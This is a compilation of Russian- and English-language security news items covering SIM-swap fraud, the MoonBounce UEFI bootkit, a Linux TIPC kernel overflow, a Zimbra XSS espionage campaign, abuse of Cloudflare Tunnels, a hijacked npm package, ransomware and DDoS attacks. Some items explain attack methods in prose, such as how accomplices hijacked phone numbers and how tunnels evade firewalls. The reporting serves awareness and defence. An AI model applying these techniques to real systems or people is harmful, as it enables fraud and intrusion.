В период с 2017 по 2020 год мошенники украли почти $690 000 у более чем сотни жертв, многие из которых были пожилыми людьми и в некоторых случаях лишались всех своих сбережений.
Роль Осемвеги заключалась в открытии счетов с использованием украденных или поддельных паспортов. Он сделал это по меньшей мере 16 раз в семи банках, используя четыре поддельных проездных документа, чтобы скрыть свою истинную личность.
Мошенника привлекли к ответственности ФБР, Почтовая инспекционная служба США и отдел финансового мошенничества и кибермошенничества прокуратуры штата Массачусетс, которые внесли свой вклад в расследование.
Министерство Юстиции США, расследовав факт мошенничества с криптовалютами, приговорило калифорнийского студента из Сан-Диего к выплате компенсации и испытательному сроку.
Департамент прокуратуры Восточного округа Луизианы сообщил, что 21-летний Ричард Юань Ли (Richard Yuan Li) получил три года испытательного срока и штраф в размере $61 000 за криптомошенничество с SIM-картами на сумму более $57 000.
Прокуратура предъявила Ли обвинение в заговоре с целью реализации мошеннической схемы, в результате которой пострадали 19 человек. У инвестора из Нового Орлеана были похищены цифровые активы на биржах Binance, Bittrex, Coinbase, Gemini и Poloniex, а один из сообщников Ли вымогал у жертвы 100 BTC.
В своей мошеннической схеме Ли и его подельники сначала обманули представителя Apple, чтобы он отправил им iPhone 8, а затем «организовали перевод телефонного номера жертвы» на этот телефон и обошли меры безопасности, чтобы получить доступ к файлам.
Таким образом Ли и его сообщники получали личную финансовую информацию своих потенциальных жертв, включая банковские и криптовалютные счета, и другие учетные записи с двухфакторной аутентификацией.
По данным Министерства юстиции, Ли участвовал как минимум в 28 мошенничествах с SIM-картами в период с октября по декабрь 2018 года. Прокуратура Восточного округа Луизианы заявила, что действия Ли представляют собой федеральные преступления, поскольку при подмене SIM-карты сигналы передаются через границы штатов и эти действия подпадают под положения Конституции США о торговле между штатами.
При худшем положении дел Ли мог получить пять лет тюрьмы, штраф в размере $250 000 и 100 часов общественных работ, поэтому можно сказать, что ему повезло – власти, похоже, не ужесточили наказание за подобные преступления.
Обнаружены критические уязвимости в промышленных продуктах SmartPTT и SmartICS российской компании Elcomplus, специализирующейся на производстве средств радиосвязи и промышленной автоматизации.
Авторитетный ресерчер Майкл Хайнцл обнаружил в общей сложности девять уязвимостей в SCADA-продукте Elcomplus SmartPTT, который сочетает в себе возможности SCADA/IIoT с диспетчерским ПО для профессиональных радиосистем. А если учесть и то, что продукты SmartICS также подвержены некоторым уязвимостям, поскольку они имеют общий код.
Уязвимые продукты используются более чем 2000 организациях на территории 90 стран, в том числе и США. Перечень ошибок включает: обход пути, межсайтовые сценарии (XSS), произвольную загрузку файлов, обход авторизации, подделку межсайтовых запросов (CSRF) и проблемы с раскрытием информации.
Эксплуатация уязвимостей может позволить злоумышленнику:
- загружать файлы,
- читать или записывать произвольные файлы в системе,
- получать учетные данные, хранящиеся в открытом виде,
- выполнять различные действия от имени пользователя,
- выполнять произвольный код,
- повышать привилегии до уровня администратора.
В некоторых случаях для эксплуатации требуется аутентификация или взаимодействие с пользователем (например, переход по ссылке или доступ к определенным страницам).
Исследователь уведомил поставщика об уязвимостях через CISA в апреле 2021 года, соответствующие исправления были выпущены в конце 2021 года. Тем не менее, CISA опубликовало два бюллетеня по этим уязвимостям. Пользователям рекомендуется выполнить обновление до версии 2.3.4 или выше.
Прикарпатские полицейские сообщили о подозрении хакеру, который распространял вредоносное программное обеспечение.
Житель Ивано-Франковской области подозревается в создании и использовании вредоносного программного обеспечения, через которое распространялись вирусы, с целью получения прибыли. Сейчас правонарушителю следователи сообщили о подозрении, а досудебное расследование продолжается.
Противоправную деятельность злоумышленника разоблачили сотрудники отдела противодействия киберпреступлениям Прикарпатья совместно с сотрудниками УСБУ в Ивано-Франковской области и следователями Коломыйского районного управления полиции при процессуальном руководстве Коломыйской окружной прокуратуры.
Об этом пишет «Галка» со ссылкой на полицию Прикарпатья.
В ходе проведения следственных действий правоохранители установили, что 34-летний житель Ивано-Франковской области, специалист в ИТ-сфере, с помощью собственного аппаратно-технического оборудования создал электронные файлы, распознающиеся как вредоносное программное обеспечение.
«С целью получения прибыли, используя вредоносное программное обеспечение, предварительно осуществив его модификацию для получения обратной связи со своим ИР-адресом, осуществлял его распространение, которое предназначено для несанкционированного доступа к электронно-вычислительным машинам неограниченного круга лиц и дальнейшего несанкционированного доступа к ним», - говорится в сообщении.
В ходе обысков, проведенных по месту жительства злоумышленника, изъята компьютерная техника.
Прикарпатцу следователи сообщили о подозрении по ч.1 ст.361-1 (Создание с целью использования, распространения или сбыта вредоносных программных или технических средств, а также их распространения или сбыта) УКУ.
В конце 2021 года, изучая логи Firmware Scanner, эксперты «Лаборатории Касперского» обнаружили компрометацию на уровне прошивки UEFI. Дальнейший анализ показал, что злоумышленники модифицировали один из компонентов в исследуемом образе прошивки, что позволило им изменить цепочку выполнения в UEFI и внедрить вредоносный код, запускаемый при старте машины.
Проанализировав компоненты модифицированной прошивки и другие артефакты вредоносной активности в сети жертвы, исследователи пришли к выводу, что в исследуемую прошивку был внедрен вредоносный код, который получил имя MoonBounce.
Отличительной особенностью MoonBounce является то, что малварь скрывается не в разделе ESP (EFI System Partition), где обычно располагается часть кода UEFI, а сразу внедряется во флэш-память SPI, расположенную на материнской плате. То есть вредонос может запускаться как после переустановки операционной системы, так и после форматирования или замены жесткого диска. Фактически буткит останется на зараженном устройстве вплоть до перепрошивки SPI-памяти (а это очень сложный процесс) или вплоть до замены материнской платы.
По информации «Лаборатории Касперского», MoonBounce — это уже третий буткит UEFI, который встречался ИБ-аналитикам и был способен заражать SPI-память. Предыдущие два случая, это малварь [LoJax](https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit- found-wild-courtesy-sednit-group/) и MosaicRegressor.
Бэкдор использует компонент прошивки, известный под именем CORE_DXE, — он вызывается на ранней стадии цепочки загрузки UEFI.
«Заражение начинается с ряда перехватов, которые вмешиваются в выполнение некоторых функций таблицы EFI Boot Services Table: AllocatePool, CreateEventEx и ExitBootServices. Таким способом вредоносу удаётся перенаправить поток этих функций на вредоносный шеллкод, который атакующие добавляют образу CORE_DXE», — [пишут в отчёте](https://media.kasperskycontenthub.com/wp- content/uploads/sites/43/2022/01/19115831/MoonBounce_technical- details_eng.pdf) специалисты «Лаборатории Касперского».
Исследователи заявили, что MoonBounce использовался как способ поддержания доступа к зараженному хосту и развертывания малвари на втором этапе атаки. Фактически, пока MoonBounce был развернут только один раз (в сети неназванной транспортной компании), и, основываясь на другой малвари, развернутой в той же сети, исследователи предположили, что MoonBounce — это работа китайской кибершпионской группировки APT41.
Связи между элементами инфраструктуры имплантов MoonBounce и ScrambleCross, обнаруженных в одной сети
Так, MoonBounce, и другие вредоносы , обнаруженное в сети жертвы, часто связывались с одной и той же серверной инфраструктурой, откуда они, скорее всего, получали инструкции от APT41.
Единственной загадкой для исследователей пока остался способ установки MoonBounce.
Детальный [технический отчёт](https://securelist.ru/moonbounce-the-dark-side- of-uefi-firmware/104266/), посвященный MoonBounce, уже опубликован на сайте компании.
Банк России продолжает закручивать гайки на рынке платежных систем, усиливая контроль за потоками наличных, объем которых в экономике взлетел на фоне рецессии и пандемии.
Вслед за ЮMoney (ранее «Яндекс.Деньги») и Qiwi с ограничениями от ЦБ столкнулась международная система WebMoney, имеющая больше 40 миллионов пользователей в мире и проводящая в России более 700 тысяч транзакций в год.
В понедельник, 6 декабря, гарант и расчетный банк системы по рублевым кошелькам (WMP, WMR), получил предписание ЦБ РФ о приостановлении операций пополнения и перевода электронных средств платежа, сообщила WebMoney на своем сайте.
Предписание сроком на 6 месяцев было выдано Консервативному коммерческому банку (ККБ) и вступает в силу с 7 декабря. На этот же срок WebMoney приостанавливает операции пополнения и перевода для электронных рублевых кошельков, вывести средства с которых теперь будет можно лишь через систему быстрых платежей ЦБ.
«Доступными для владельцев P и R-кошельков остаются только операции оплаты в торгово-сервисных предприятиях, уплата штрафов и налогов, вывод рублей на собственные банковские счета», - говорится в сообщении на сайте системы.
В январе 2021 года сервис электронных платежей ЮMoney (входит в экосистему «Сбера») в соответствии с предписанием ЦБ РФ ограничил операции между физическими лицами и компаниями-нерезидентами, а в декабре 2020 года о подобных ограничениях сообщал платежный сервис Qiwi.
ЦБ занялся платежным рынком, через который проходят миллиарды рублевых купюр на фоне резкого всплеска оборота наличных в экономике.
За 2020 год объем кэша в обращении взлетел на 2,6 триллиона рублей (25%). И хотя ЦБ неоднократно прогнозировал что «кэш» вернется в банковскую систему по мере того, как люди будут увеличивать расходы, этого не произошло.
За январь-август объем кэша в российской экономике, по данным ЦБ, вырос еще на 300 млрд рублей, а затем на такую же сумму в сентябре, когда получив предвыборные выплаты, россияне обналичили каждый второй рубль.
• Source: <https://www.finanz.ru/novosti/valyuty/cb-ostanovil-perevody-po- webmoney-1031027205>
The private Howard University in Washington disclosed that it suffered a
ransomware attack late last week and is currently working to restore affected
systems.
University officials expect full recovery from the incident to take a long
time although work is being done to remediate the situation as quickly as
possible.
The attack took offline a large number of university systems, leading to
reduced operations. Classes on Tuesday were canceled and the physical campus
remained open only to essential employees.
In a statement this week, Howard University says that its information
technology team on Friday, September 3, detected irregular activity on the
network.
Following the cyber response protocol designed to limit and mitigate cyber
criminal activity, the university’s Enterprise Technology Services (ETS) shut
down the network and started to investigate the issue.
WiFi on campus remains unavailable as a result of the attack and the
connection will be so until finding the best solution to restore it.
Applications stored in the cloud have not been impacted by the attack and are
active and available. Other apps may not be accessible due to ETS’ work to
restore systems.
Although the university is working to restore operations, there is no estimate
for complete remediation. Officials informed that recovery from a ransomware
incident “is a long haul – not an overnight solution.”
“We are currently working with leading external forensic experts and law enforcement to fully investigate the incident and the impact” - [Howard University](https://newsroom.howard.edu/newsroom/article/14946/ransomware- cyberattack-update)
Based on evidence collected so far, the university says that there is no indication of personal information “being accessed or exfiltrated.”Click to expand...
This is not a definitive conclusion, though, as the investigation continues
and it is well known that most ransomware gangs adopted the double-extortion
tactic where they also steal data before encrypting it, threatening with
leaking the files unless the victim pays for the decryption key.
The university has taken additional steps to increase the protection of all
sensitive personal, research, and clinical data against unauthorized
encryption.
The FBI has been informed of the situation. The university has also contacted
the D.C. city government.
Источник:https://www.bleepingcomputer[.]com/...y-shuts-down-network-after- ransomware-attack/
Кнопочные телефоны ряда российских брендов обладают незадекларированными функциями: 80% устройств, например, отправляют платные СМС или позволяют регистрировать сторонних лиц в интернет-сервисах, пишет «Коммерсант», ссылаясь на пользователя сайта Habr. Он протестировал кнопочные телефоны, которые продаются в российской рознице, и оказалось, что четыре из пяти устройств содержат незадекларированную функциональность.
Так, например, модель SF63 российского бренда Irbis может использовать номера телефонов для регистрации сторонних лиц в интернет-сервисах, а Dexp SD2810 сети магазинов DNS отправляет СМС-сообщения на платные короткие номера. Устройства бренда F+ автоматически и незаметно для пользователя отправляют СМС-сообщения на определенный номер с информацией о номере устройства и сим- карте. В компании «Ф-Плюс Мобайл» сообщили, что, если получают «обращения пользователей по поводу каких-либо багов, исправляют их в следующих прошивках». В DNS и Irbis не ответили на запросы.
По словам эксперта по кибербезопасности «Лаборатории Касперского» Виктора Чебышева, условно скрытые функции делятся на два типа: в первом случае смартфон отправляет СМС с информацией об активации телефона (IMEI), во втором — сообщения отправляются на короткие приватные номера по цене, которая до десяти раз превышает стоимость отправки текста, согласно тарифу, пишут «Известия». Извещение производителя об активации того или иного устройства — это скрытая сервисная опция, которая не несет в себе ничего зловредного. Функция, которая позволяет удаленно управлять устройством, — это типичный СМС- троянец, отметил эксперт. Телефон всегда должен спрашивать у пользователя разрешения на отправку сообщения, подчеркнул Чебышев.
Такие проблемы преимущественно характерны для телефонов малоизвестных брендов, отметил директор Центра Solar appScreener компании «Ростелеком-Солар» Даниил Чернов. Модификации прошивок с отправкой СМС могут быть заказом от владельцев сервисов подписок, считает ведущий инженер СorpSoft24 Михаил Сергеев. Устройства с «закладками» используются для предоставления доступа к телефонным номерам различных стран, в том числе для получения двухфакторной авторизации при регистрации аккаунтов, например, в мессенджерах, пояснил Чебышев. Они могут применяться, например, для распространения наркотиков или спама. Не исключено, что такие устройства собираются в ботнет-сети.
Ведущий аналитик Mobile Research Group Эльдар Муртазин, ссылаясь на данные операторов, отметил, что устройств, отправляющих платные СМС, не более 2%. По его сведениям, на долю кнопочных телефонов приходится около 30% от всех активированных мобильников в стране. В «Лаборатории Касперского» отметили, что обсуждаемый функционал — часть прошивки телефона, следовательно, троянец может интегрироваться либо во время производства на заводе, либо на одном из этапов поставки устройства. Муртазин уверен, что скрытый функционал внедряют китайские изготовители. С ним согласен руководитель департамента информационно-аналитических исследований компании T.Hunter Игорь Бедеров. По его словам, функционал может быть внедрен в устройства для слежки за пользователями.
Подробнее с картинками: https://habr.com/ru/post/575626/
Прокуроры Житомирской областной прокуратуры направили в суд обвинительный акт в отношении жителя Киевской области по факту мошенничества, совершенного повторно, с использованием электронно-вычислительной техники, причинившего значительный ущерб потерпевшим, и легализации (отмывания) средств, полученных преступным путем (ч. 3 ст. 190, ч. ч. 1,2 ст. 209 УК Украины).
По данным следствия, мошеннические действия совершал неоднократно судимый 32-летний житель Киевской области. Во время пребывания в следственном изоляторе учреждения исполнения наказаний города Житомира он разработал мошенническую схему, с помощью которой снимал средства с банковских счетов разных граждан.
Делец звонил пострадавшему, представлялся работником банка и сообщал о возможности получения средств от ООН «Красный крест» на сумму 6600 грн. А для перерасчета денег необходимо предоставить реквизиты банковской карты и подтвердить такую операцию.
Будучи введенным в заблуждение, потерпевший выполнял все указания, сообщал мошеннику CVV-код и другую конфиденциальную информацию своей банковской карты, вследствие чего враз избавлялся от сбережений.
Полученные преступным способом деньги делец использовал на собственные нужды, в значительной мере - для оплаты на игровых сайтах.
Установлено, что в течение января-мая 2023 года обвиняемый с помощью мобильного приложения перевел с чужих банковских карт на свои подконтрольные счета 140 тыс. грн. От его мошеннических действий пострадали 12 жителей разных областей.
Процессуальное руководство осуществляла Житомирская областная прокуратура.
Досудебное расследование, при оперативном сопровождении Управления уголовного розыска - ГУНП в области.
Следователем главного следственного управления ГУ МВД России по городу Санкт- Петербургу и Ленинградской области завершено расследование уголовного дела по обвинению 39-летнего жителя Ханты-Мансийского Автономного округа и 44-летнего ранее судимого жителя Ульяновской области в мошенничествах с использованием средств IP-телефонии и сети Интернет (ч. 4 ст. 159 Уголовного кодекса Российской Федерации).
Установлено, что мужчины познакомились в 2012 году, когда работали в одной коммерческой фирме города Нягани в Югре. В 2021 году они создали два интернет- сайта, которые анонсировали возможность приобретения компьютерной техники и телефонов известных брендов с 30-50 % скидками. Причём бонусы всегда действовали только один день, поэтому для оформления заказа и доставки товара его надо было предварительно полностью оплатить.
Получив от потерпевших денежные средства, злоумышленники переставали выходить на связь. Ни свой товар, ни потраченные финансы обманутые граждане получить уже не могли.
Ранее сообщалось, что в данной преступной схеме житель Ульяновской области, используя IP-телефонию, исполнял роль оператора интернет-магазинов, звонил клиентам, принимал и обрабатывал заказы. Его подельник осуществлял разработку, администрирование и продвижение сайтов, а также распределял полученные деньги.
Противоправную деятельность обвиняемых пресекли сотрудники УБК ГУ МВД России по городу Санкт-Петербургу и Ленинградской области в июне 2022 года.
В ходе обысков по адресам проживания злоумышленников изъяты средства сотовой связи, банковские карты, ноутбуки и другие предметы, имеющие доказательственное значение.
Цитата:
Потерпевшими являются 65 человек из разных регионов России, в том числе 10 жителей Северной столицы и 5 москвичей. Общая сумма ущерба составила 1,1 млн рублей.
На доли в уставном капитале фирмы, принадлежащей одному из соучастников, наложен арест в качестве обеспечительной меры для последующего возмещения ущерба потерпевшим.
В настоящее время уголовное дело с утверждённым обвинительным заключением направлено в Смольнинский районный суд Санкт-Петербурга для рассмотрения по существу. Приговора фигуранты будут дожидаться, находясь под стражей.
С «инвестором» Григорием Мулузяном Ткаченко познакомил криптоактер Павел Деревянко, которого друзья развели на крипте на 45 млн рублей и обещали 84% годовых.
Мулузян предложил Ткаченко заработать — поделиться доступом к криптокошельку и биткоинами. Первое время всё шло нормально: Ткаченко получал 10% ежемесячного дохода от 7,5 биткоинов, инвестированных в Мулузяна.
Но затем прибыль начала сокращаться. Летом 2022-го на отдыхе в Турции Мулузян рассказал Ткаченко и Деревянко, что может продать им доли в его криптобизнесе. Всего за 150 тысяч долларов. Стороны ударили по рукам, но потом они начали спорить и Мулузян уволил Ткаченко из «криптобизнеса».
Спустя два года отношений с Мулузяном Артём Ткаченко понял, что его водили за нос. Актёр пошёл в полицию. По его подсчётам, он отдал Мулузяну почти 200 тысяч долларов и 6 млн руб.
Хакеры всё чаще злоупотребляют легитимной функцией Cloudflare Tunnels для создания скрытных HTTPS-соединений с заражённых устройств, обхода брандмауэров и долгосрочного закрепления в системе.
Cloudflare Tunnels — популярная функция Cloudflare, позволяющая создавать
защищённые исходящие соединения с сетью Cloudflare для веб-серверов или
приложений.
Эксплуатируемая кибербандитами лазейка не является совсем новой. В январе
этого года мы уже сообщили , что злоумышленники создали вредоносные пакеты
PyPI, использующие Cloudflare Tunnels для скрытного кражи данных или
удалённого доступа к устройствам.
Однако похоже, что всё больше хакеров начали применять эту тактику. Так, на прошлой неделе специалисты компаний GuidePoint отметили всплеск такой активности.
Пользователи сервиса Cloudflare могут развернуть туннель, просто установив один из доступных клиентов Cloudflared для Linux, Windows, macOS и Docker. Далее сервис получает доступ в интернет по указанному пользователем хосту для законных сценариев использования, таких как совместное использование ресурсов, тестирование и т.д.
Cloudflare Tunnels предоставляют широкий спектр средств управления доступом, настройки шлюзов, управления командами и аналитики пользователей, давая высокую степень контроля над туннелем и предоставляемыми сервисами.
Исследователи GuidePoint сообщают, что всё больше злоумышленников используют Cloudflare Tunnels в преступных целях — для скрытного постоянного доступа к сети жертвы, обхода обнаружения и эксфильтрации данных с заражённых устройств.
Для этого достаточно одной команды с устройства жертвы, не выдающей ничего кроме уникального токена туннеля злоумышленника. При этом атакующий может в реальном времени изменять конфигурацию туннеля, отключать и включать его по мере необходимости.
«Туннель обновляется, как только изменение конфигурации вносится в панель управления Cloudflare, позволяя атакующим включать функциональность только когда им нужно проводить действия на машине жертвы, а затем отключать её, чтобы избежать обнаружения своей инфраструктуры», — поясняют в GuidePoint.
Поскольку HTTPS-соединение и обмен данными происходит через протокол QUIC на порту 7844, маловероятно, что брандмауэры или другие средства защиты сети выявят этот процесс, если не были настроены специально для этого.
Более того, если злоумышленник захочет быть ещё более скрытным, он может злоупотребить функцией «Попробовать Cloudflare», позволяющей создавать одноразовые туннели без регистрации аккаунта.
Однако и это не предел возможностей хакеров. В GuidePoint отметили, что также возможно злоупотребление функцией «Частные сети», чтобы атакующий, установивший туннель к одному клиентскому (заражённому) устройству, получил таким образом удалённый доступ ко всему диапазону внутренних IP-адресов.
Для обнаружения несанкционированного использования Cloudflare Tunnels исследователи GuidePoint рекомендуют отслеживать специфические DNS-запросы (приведены в отчёте ) и использовать нестандартные порты вроде 7844.
Кроме того, поскольку Cloudflare Tunnel требует установки отдельного клиента Cloudflared, защитники могут выявить его с помощью мониторинга хешей файлов, связанных с релизами клиента.
Бeлый xaкep пoмoг DeFi-пpoтoкoлу Yearn.Finance иcпpaвить уязвимocть
Ocнoвнoй paзpaбoтчик экocиcтeмы DeFi Yearn.Finance (YFI) Бaнтeг (@bantg) cooбщил пoдpoбнocти гипoтeтичecкoй aтaки нa элeмeнты cвoeгo пpoтoкoлa, кoтopыe pacкpыл тaк нaзывaeмый бeлый xaкep. Eщё З0 янвapя 2022 гoдa cпeциaлиcт oпиcaл cцeнapий aтaки нa SingleSidedBalancer, элeмeнт инcтpумeнтapия дoxoднoгo фepмepcтвa Yearn.Finance.
Инcтpумeнт SingleSidedBalancer strategу (или SSB) пpeднaзнaчeн для тoгo, чтoбы пoзвoлить энтузиacтaм DeFi зaнимaтьcя дoxoдным фepмepcтвoм нaтивнoй вaлюты Balancer BAL, oбecпeчивaя ликвиднocть oднoгo aктивa. SSB aктивны нa блoкчeйнax Ethereum (ETH) и Fantom (FTM). Cxeмa aтaки пoзвoлялa xaкepaм cбaлaнcиpoвaть пул Balancer и пoлучить USDT пo зaвышeннoй цeнe. Блaгoдapя cepии флэш-кpeдитoв в USDC и DAI злoумышлeнник мoжeт иcтoщить пул ликвиднocти Yearn.Finance нa cумму, эквивaлeнтную $ 41 млн. Coглacнo oбъяcнeнию Yearn.Finance в peпoзитopии нa GitHub, уязвимocть былa уcтpaнeнa зa 25 минут, a вce элeмeнты, кoтopыe мoжнo иcпoльзoвaть, oтключeны. Teпepь cpeдcтвa в бeзoпacнocти.
В модуле ядра Linux, обеспечивающем работу сетевого протокола TIPC (Transparent Inter-process Communication), выявлена уязвимость ([CVE-2022-0435](https://security- tracker.debian.org/tracker/CVE-2022-0435)), потенциально позволяющая выполнить свой код на уровне ядра через отправку специально оформленного сетевого пакета. Проблема затрагивает только системы с загруженным модулем ядра tipc.ko и настроенным стеком TIPC, который обычно используется в кластерах и по умолчанию не активирован в неспециализированных дистрибутивах Linux.
Отмечается, что при сборке ядра в режиме "CONFIG_FORTIFY_SRC=y" (применяется в RHEL), добавляющем дополнительные проверки границ в функцию memcpy(), эксплуатация ограничивается аварийной остановкой работы (ядро впадает в состояние panic). При выполнении без дополнительных проверок и при утечке сведений о канареечных метках, применяемых для защиты стека, проблема может быть использована для удалённого выполнения кода с правами ядра. Выявившие проблему исследователи заявляют, что техника эксплуатации тривиальна и будет раскрыта после повсеместного устранения уязвимости в дистрибутивах.
Уязвимость вызвана переполнением стека, происходящем при обработке пакетов, значение поля с числом узлов участников домена, в которых превышает 64. Для хранения параметров узлов в модуле tipc.ko используется фиксированный массив "u32 members[64]", но в процессе обработки указанного в пакете номера узла не выполняется проверка значения "member_cnt", что позволяет использовать значения больше 64 для контролируемой перезаписи данных в области памяти, следующей в стеке после структуры "dom_bef".
Приводящая к уязвимости ошибка была внесена 15 июня 2016 года и вошла в состав ядра Linux 4.8. Уязвимость устранена в выпусках ядра Linux 5.16.9, 5.15.23, 5.10.100, 5.4.179, 4.19.229, 4.14.266 и 4.9.301. В ядрах большинства дистрибутивов проблема пока остаётся неисправленной: RHEL, Debian, Ubuntu, SUSE, Fedora, Gentoo, Arch Linux.
Протокол TIPC изначально разработан компанией Ericsson, предназначен для организации межпроцессного взаимодействия в кластере и активируется главным образом на узлах кластеров. TIPC может работать как поверх Ethernet, так и поверх UDP (сетевой порт 6118). В случае работы поверх Ethernet атака может быть совершена из локальной сети, а при использовании UDP - из глобальной сети, если порт не прикрыт межсетевым экраном. Атака также может быть совершена непривилегированным локальным пользователем хоста. Для активации TIPC необходима загрузка модуля ядра tipc.ko и настройка привязки к сетевому интерфейсу при помощи netlink или утилиты tipc.
Хакеры шпионят за пользователями Zimbra через уязвимость 0-day
За атаками может стоять группировка TEMP_HERETIC, чьей целью являются правительственные и медийные организации в Европе.
Киберпреступники, предположительно связанные с Китаем, активно атакуют пользователей платформы электронной почты с открытым исходным кодом Zimbra через уязвимость нулевого дня в рамках кампаний целенаправленного фишинга, начавшихся в декабре прошлого года.
Шпионская операция, получившая кодовое название EmailThief, подробно описана в отчете ИБ-компании Volexity, опубликованном в четверг, 3 февраля. Согласно отчету, уязвимость межсайтового скриптинга (XSS) позволяет выполнить произвольный JavaScript-код в контексте пользовательского сеанса на платформе Zimbra. Проблема затрагивает последнюю версию Zimbra 8.8.15
Исследователи отнесли атаки на счет ранее неизвестной хакерской группировки TEMP_HERETIC, чьей целью являются правительственные и медийные организации в Европе.
Атаки проходят в два этапа. На первом этапе злоумышленники проводят разведку и рассылают электронные письма с целью проверить, получает ли жертва и открывает ли сообщения. На втором этапе рассылается большое количество писем, в которых получателей обманом вынуждают нажать на вредоносную ссылку.
Для того чтобы атака прошла успешно, жертва должна зайти на вредоносный сайт по ссылке, будучи авторизованной в web-клиенте Zimbra в браузере. Однако сама ссылка может запускаться из толстого клиента, например, Thunderbird или Outlook.
Неисправленная уязвимость может использоваться для извлечения файлов cookie, что позволит злоумышленникам получить постоянный доступ к почтовому ящику и отправлять фишинговые письма со взломанных учетных записей.
Пользователям Zimbra рекомендуется обновить платформу до версии 9.0.0, поскольку версия 8.8.15 является уязвимой.
Противоправную деятельность двух 26-летних мужчин разоблачили работники Управления противодействия киберпреступлениям в Днепропетровской области совместно со следователями областной полиции.
Киберполицейские установили, что правонарушители использовали вредоносное программное обеспечение для взлома учетных записей интернет-ресурсов украинских предприятий. В дальнейшем скомпрометированные учетные записи формировали в базы данных и сбывали на хакерских форумах. В результате противоправной деятельности правонарушители продали аккаунты граждан Украины на более чем 100 тысяч гривен.
По местам жительства фигурантов правоохранители провели обыски и изъяли компьютеры, мобильные телефоны, флеш-носители, жесткие диски и другую технику. Во время осмотра этой техники правоохранители обнаружили вредоносное программное обеспечение и скомпрометированную конфиденциальную информацию более 50 000 учетных записей, в частности электронных ящиков и паролей к учетным записям торговых, рекламных, медийных ресурсов.
Обоим фигурантам объявлено подозрение в совершении уголовного правонарушения, предусмотренного ч. 2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи), ч. 1 ст. 361-1 (Создание с целью использования, распространения или сбыта вредоносных программных или технических средств, а также их распространения Злоумышленникам грозит до шести лет лишения свободы. Организатор преступной схемы взят под стражу.
Злоумышленникам удалось получить контроль над NPM-пакетом coa и выпустить обновления 2.0.3, 2.0.4, 2.1.1, 2.1.3 и 3.1.3, включающие вредоносные изменения. Пакет coa, предоставляющий функции для разбора аргументов командной строки, насчитывает около 9 млн загрузок в неделю и используется в качестве зависимости у 159 других NPM-пакетов, включая react-scripts и vue/cli-service. Администрация NPM уже удалила выпуск с вредоносными изменениями и заблокировала публикацию новых версий до возвращения доступа к репозиторию основного разработчика.
Атака была совершена через взлом учётной записи разработчика проекта. Добавленные вредоносные изменения аналогичны тем, что использовались в совершённой две недели назад атаке на пользователей NPM-пакета UAParser.js, но ограничились атакой только на платформу Windоws (в блоках загрузки для Linux и macOS оставлены пустые заглушки). На систему пользователя с внешнего хоста загружался и запускался исполняемый файл для выполнения майнинга криптовалюты Monero (использовался майнер XMRig) и устанавливалась библиотека для перехвата паролей.
При формировании пакета с вредоносным кодом была допущена ошибка, которая вызывала сбой при установке пакета, поэтому проблема была оперативно выявлена и распространение вредоносного обновления было блокировано на ранней стадии. Пользователем следует убедиться, что у них установлена версия coa 2.0.2 и желательно добавить в package.json своих проектов привязку к рабочей версии на случай повторной компрометации.
PHP:Copy to clipboard
npm и yarn:
"resolutions": { "coa": "2.0.2" },
pnpm:
"pnpm": {
"overrides": {
"coa": "2.0.2"
}
},
Прокуратура города Минска направила в суд уголовное дело в отношении четырех столичных жителей, которые использовали вредоносное программное обеспечение, а также готовились к массовым беспорядкам с оружием, сообщает БЕЛТА со ссылкой на службу информации прокуратуры.
По материалам дела 35-летний фигурант, действуя вместе с 32-летним и 35-летним знакомым, с помощью вредоносного ПО получил несанкционированный доступ к компьютерным системам КУП "ЦИТ Мингорисполкома" и ГУВД Мингорисполкома. Затем обвиняемые, чтобы воспрепятствовать нормальной работе предприятий и государственных органов, скопировали и удалили файлы различных форматов, а также внесли в них заведомо ложную информацию.
Кроме того, трое фигурантов, а также их 33-летний знакомый летом и осенью 2020 года в ходе несанкционированных массовых мероприятий шли в составе толпы по проспектам и улицам Минска, в том числе по пр.Независимости и пр.Победителей, ул.Немиге и ул.Тимирязева. Эти действия блокировали и преграждали путь городскому пассажирскому транспорту. На законные требования представителей органов внутренних дел мужчины не реагировали.
Тогда же обвиняемые приобрели охотничий карабин, патроны к нему, светошумовые патроны, гладкоствольное охотничье ружье, нож, бронежилет, радиостанции, пневматическое оружие, пиротехнические изделия, а также другие предметы и устройства, обладающие метательными и поражающими свойствами. Впоследствии они намеревались использовать эти предметы при участии в массовых беспорядках. Свой преступный умысел они не довели до конца, поскольку их задержали правоохранители.
Более того, двое обвиняемых, действуя с иными лицами, приобрели аэрозольную краску в баллончиках, малярные кисти, перчатки, ленты, трафареты и иные предметы, с помощью которых осенью 2020 года нанесли на фасады зданий надписи и изображения протестного характера, а также закрепили матерчатые ленты в общественных местах. В результате таких действий причинен ущерб ГП "ЖЭУ №6 Фрунзенского района Минска" на сумму свыше Br2 тыс.
По результатам изучения материалов уголовного дела в прокуратуре города Минска пришли к выводу об обоснованности обвинения, объективном исследовании обстоятельств преступлений и согласились с квалификацией содеянного.
Примененную ранее к обвиняемым меру пресечения прокурор при направлении дела в суд оставил прежней - заключение под стражу.
Аналитики Qrator Labs зафиксировали беспрецедентный рост числа DDoS-атак на финансовый рынок РФ. Сообщается, что атаки организованны с помощью нового ботнета Mēris, и в минувшие выходные их количество резко выросло более чем в три раза.
[](https://xakep.ru/wp- content/uploads/2021/09/359135/photo_2021-09-16_01-38-12.jpg)
Напомню, что об этом ботнете недавно детально
рассказали специалисты «Яндекса» и все
той же Qrator Labs. Именно он ответственен за мощнейшие DDoS-атаки последнего
времени, пиковая мощность которых составляла 17,2 и 21,8 млн запросов в
секунду, что является новым рекордом. К примеру, в последнее время Mēris
атаковал «Яндекс», одного из клиентов Cloudflare, а также стоял за DDoS-
атаками в Новой Зеландии, из-за которых в стране местами перестал работать
интернет, возникли проблемы у банков, почтовых отделений и так далее.
Ботнету дали имя Mēris – «чума» по-латышски, так как считается, что в основном
он состоит из устройств латвийской компании Mikrotik.
Теперь исследователи говорят, что в августе и сентябре 2021 года в целом
наблюдается рост числа DDoS-атак на компании из самых разных секторов
экономики: от небольших бизнесов до крупнейших корпораций, а с начала сентября
2021 года злоумышленники сфокусировали свое внимание на российском финансовом
секторе. Число DDoS-атак на банковские организации непрерывно растет,
одновременно злоумышленники наращивают интенсивность и сложность атак,
используя мощности Mēris.
Пик нападений пришелся на 11 сентября, когда была организована целая серия
DDoS-атак на ведущие банки и платежные системы. Исследователи зафиксировали
три волны атак, максимальные скорости которых достигали 212 Гб/сек и десятки
миллионов запросов в секунду.
